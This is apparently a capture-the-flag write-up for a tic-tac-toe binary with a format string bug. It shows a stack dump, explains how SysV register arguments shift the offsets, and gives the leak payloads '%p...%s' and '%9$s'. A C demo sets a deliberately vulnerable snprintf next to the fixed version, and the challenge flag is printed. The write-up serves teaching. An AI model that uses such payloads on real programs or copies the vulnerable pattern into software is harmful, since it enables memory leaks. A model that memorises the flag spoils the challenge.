Difficulty
50/100 | MEDIUM
Simple format string attack; this is not groundbreaking stuff.
Category
Exploitation
How To Solve
There is a format string vulnerability in the print_win_message function. The name the user enters at the beginning of the game is used here directly as the printf format string, without any validation, so any conversion specifiers in the name are interpreted by printf. This lets us read values off the stack, and it happens that a pointer to the flag is sitting on the stack.
To leak the flag we are going to use the %s format specifier, which dereferences the argument it consumes as a char pointer. The problem is that there are a couple of other values on the stack before that pointer. For example, with the test name '%x%x%x%s' entered, the stack looks like this right before the printf call:
00:0000│ rsp 0x7fffffffd250 —▸ 0x5555555596b0 ◂— '%x%x%x%s'
01:0008│-018 0x7fffffffd258 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
02:0010│-010 0x7fffffffd260 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
03:0018│-008 0x7fffffffd268 —▸ 0x55555555667f ◂— 'IGCTF{REDACTED}'
04:0020│ rbp 0x7fffffffd270 —▸ 0x7fffffffd2b0 —▸ 0x7fffffffd2e0 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3e0 ◂— ...
05:0028│+008 0x7fffffffd278 —▸ 0x555555555b64 (play_game+240) ◂— mov rax, qword ptr [rbp - 0x18]
06:0030│+010 0x7fffffffd280 —▸ 0x555555559740 —▸ 0x5555555596b0 ◂— '%x%x%x%s'
07:0038│+018 0x7fffffffd288 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
So three 64-bit values ([rsp], [rsp+8] and [rsp+0x10]) have to be consumed before %s reaches the flag pointer at [rsp+0x18], which suggests the payload %p%p%p%s. That would work on a 32-bit machine, where every argument lives on the stack, but this is a 64-bit binary using the SysV calling convention: the first six integer arguments are passed in registers (rdi, rsi, rdx, rcx, r8, r9), and rdi holds the format string itself. printf therefore pulls its first five variadic arguments from the remaining registers before it ever reads the stack, so we need to consume an additional 5 arguments, giving us the final payload string:
%p%p%p%p%p%p%p%p%s
The positional form %9$s reads the same ninth argument with a single conversion, which avoids printing the eight pointers first.
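The argument arithmetic above, as an added example that is not the challenge's code: it models the register-plus-stack slot count from the dump with explicit variadic arguments (so it does not depend on this program's own frame layout), builds both payload forms, and puts the vulnerable printf pattern next to the fixed one. The flag value, the function names other than print_win_message, and the slot count of 3 are constructed for the example.

```c
/* Added example; not the challenge binary's code. Models the format string
 * argument arithmetic from the writeup. Values below are constructed. */
#include <stdio.h>
#include <string.h>

#define SAMPLE_FLAG "IGCTF{constructed_sample_flag}"   /* constructed, not the real flag */
#define PAYLOAD_MAX 64

/* x86-64 SysV: rdi, rsi, rdx, rcx, r8, r9 carry the first six integer/pointer
 * arguments. rdi is the format string, so five conversions consume registers
 * before printf reads its first stack slot. */
#define X64_INT_ARG_REGS 6

/* Vulnerable pattern from the writeup: the user-controlled name is the format.
 * Kept deliberately vulnerable; never call it with untrusted input. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
static void print_win_message_vuln(char *out, size_t outsz, const char *name) {
    snprintf(out, outsz, name);            /* BUG: attacker controls conversions */
}
#pragma GCC diagnostic pop

/* Fixed pattern: the format is a constant and the name is plain data. */
static void print_win_message_fixed(char *out, size_t outsz, const char *name) {
    snprintf(out, outsz, "%s", name);
}

/* Number of conversions that must precede %s so that %s consumes the target
 * slot. stack_slots_before_target counts the slots between the caller's rsp
 * and the slot holding the target pointer (3 in the writeup's dump). */
static int conversions_before_target(int stack_slots_before_target, int is_64bit) {
    int n = stack_slots_before_target;
    if (is_64bit)
        n += X64_INT_ARG_REGS - 1;           /* register slots, minus the format string */
    return n;
}

/* Build "%p" repeated n_skip times followed by "%s". Returns 1 on success. */
static int build_leak_payload(char *out, size_t outsz, int n_skip) {
    size_t need = (size_t)n_skip * 2 + 2 + 1;
    if (need > outsz)
        return 0;
    out[0] = '\0';
    for (int i = 0; i < n_skip; i++)
        strcat(out, "%p");
    strcat(out, "%s");
    return 1;
}

/* Positional alternative "%<n_skip+1>$s": one conversion reads the target slot.
 * Caveat: a _FORTIFY_SOURCE build of glibc rejects skipped positions. */
static int build_positional_payload(char *out, size_t outsz, int n_skip) {
    return snprintf(out, outsz, "%%%d$s", n_skip + 1) < (int)outsz;
}

/* Deterministic model of the dump: five register slots and three stack slots
 * come first, then the flag pointer as the ninth variadic argument. Passing
 * them explicitly keeps the demo independent of compiler and frame layout. */
static int leak_model(char *out, size_t outsz, const char *payload) {
    void *f = NULL;                          /* filler for argument slots 1..8 */
    return snprintf(out, outsz, payload, f, f, f, f, f, f, f, f, SAMPLE_FLAG);
}

int main(void) {
    char payload[PAYLOAD_MAX], pos[PAYLOAD_MAX], out[256];
    int n = conversions_before_target(3, 1);          /* 3 stack slots, 64-bit */
    build_leak_payload(payload, sizeof payload, n);
    build_positional_payload(pos, sizeof pos, n);
    printf("skip %d -> payload %s (or %s)\n", n, payload, pos);

    leak_model(out, sizeof out, payload);
    const char *hit = strstr(out, "IGCTF{");
    printf("leaked: %s\n", hit ? hit : "(nothing)");

    print_win_message_fixed(out, sizeof out, payload);
    printf("fixed version prints the name as data: %s\n", out);
    (void)print_win_message_vuln;                      /* shown, not exercised */
    return 0;
}
```

The vulnerable function is included only to show the pattern; running it on the payload would read whatever happens to be in this program's own argument slots, which is exactly the behaviour the writeup exploits in the challenge binary.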
Flag
IGCTF{W3ll_y0u_st1ll_l0st_BuT_at_l3ast_yoU_g0t_th3_fl4g}